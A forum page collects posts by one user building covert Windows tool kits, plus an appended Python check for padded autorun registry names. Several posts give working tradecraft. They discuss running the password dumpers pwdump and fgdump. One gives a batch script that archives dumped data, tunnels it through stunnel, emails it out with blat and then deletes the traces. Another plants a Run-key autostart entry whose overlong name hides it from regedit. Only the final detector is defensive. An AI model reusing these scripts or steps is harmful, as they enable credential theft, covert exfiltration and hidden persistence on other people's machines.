Everything posted by Joerg

  1. Emm, I tested pwdump(3/4/5/6) and fgdump, but if I call them in a batch they don't work. But if I use cmd.exe to execute these programs, they work if they find a share. Is it a problem with my machine, a coding mistake or a bug in the program? Joerg
  2. But if you have to smuggle the dumped information out of a $building, it wouldn't be bad having a copy on a mailserver.
  3. I did it once, but later I realized that I'll have the dumped files twice. Edit:

     1. Copy all files from the sbs folder (except for example sbs.exe) to the dump folder
     2. Create a new send.bat file (like from the hacksaw) and use this code:

         @echo on
         :start
         SET emailto=
         SET emailfrom=
         SET password=
         SET subject=dump.%date%.%computername%
         rar.exe a dump.%date%.%computername%.rar -v1024k -vn .%date%.%computername%"
         stunnel-4.11.exe -install -quiet 2>nul
         net start stunnel 2>nul
         GOTO sendfiles
         :sendfiles
         for %%i in (dump.*.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -s %subject% -server 127.0.0.1:1099
         GOTO cleanup
         :cleanup
         net stop stunnel 2>nul 2>nul
         stunnel-4.11.exe -uninstall -quiet 2>nul 2>nul
         del /q /f dump.*.r*
         GOTO end
         :end
  4. After some hours of bughunting I got the idea of including an error log for the tool packages out there. I think this can help enormously to save time checking the code.

         set error=%computername%.error.log
         echo %time% %date% %computername%>>"%error%"
         if exist "C:\Windows\calc.exe" (
             calc 1/0
         ) else (
             echo calc.exe doesn't exist! >>"%error%"
         )

     Or you just don't let mistakes happen ;)
  5. As I searched the web for extreme l33tstuff ;) I came across some old news which said that regedit can't handle REG_SZ entries with more than 255 characters. I tested it with the following code and it worked. Details: http://www.reviewingit.com/index.php/content/view/28/2/

         reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Legacy USB Support " /t REG_SZ /d "%systemdrive%\system32\calc.exe"

     This will add an uberlong entry to the registry; try to search for that key with regedit now. This is only a lame protection from being uncloaked, but I think for most users this is enough ;) Greetings Joerg
  6. I'm currently developing my own collection of tools, so I looked for a tool which dumps files nicely and quietly. So I tried fc.exe and it worked quite fine, but an icon appears in the systray. Is this normal or have I forgotten a switch? Joerg
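
An added example, not part of Joerg's posts: a defender-side check for the Run-key entry described in post 5. It parses the decoded text of a `reg export` of an autorun key and flags value names that reach the 255-character mark from the post or are padded with whitespace; the padding pattern, the function name and the sample export are assumptions constructed for illustration.

```python
import re

# Assumption: 255 is the length the post says regedit cannot handle.
MAX_NAME_LEN = 255
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=')  # "name"=... with \" and \\ escapes


def audit_run_values(reg_text):
    """Return (key, trimmed_name, raw_length, reasons) for suspicious autorun values.

    reg_text is the decoded text of a .reg export (the files are UTF-16 on disk).
    """
    findings = []
    key = None
    for line in reg_text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if not m or key is None or not key.lower().endswith(RUN_KEYS):
            continue
        name = re.sub(r'\\(.)', r'\1', m.group(1))  # undo .reg escaping
        reasons = []
        if len(name) >= MAX_NAME_LEN:
            reasons.append("long-name")
        if name != name.strip():
            reasons.append("padded-name")
        if reasons:
            findings.append((key, name.strip(), len(name), reasons))
    return findings


# Constructed sample export: one ordinary value and one whose name is padded
# with 300 spaces (hypothetical padding; the post's exact name is not recoverable).
SAMPLE = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    '"ExampleUpdater"="C:\\\\Program Files\\\\Example\\\\updater.exe"\r\n'
    '"Microsoft Windows Legacy USB Support' + " " * 300 + '"="C:\\\\Windows\\\\system32\\\\calc.exe"\r\n'
)

if __name__ == "__main__":
    for key, name, length, reasons in audit_run_values(SAMPLE):
        print(f"{key}: {name!r} ({length} chars) -> {', '.join(reasons)}")
```

Because the check reads the exported text rather than relying on what regedit displays, it still reports an entry the editor may not show.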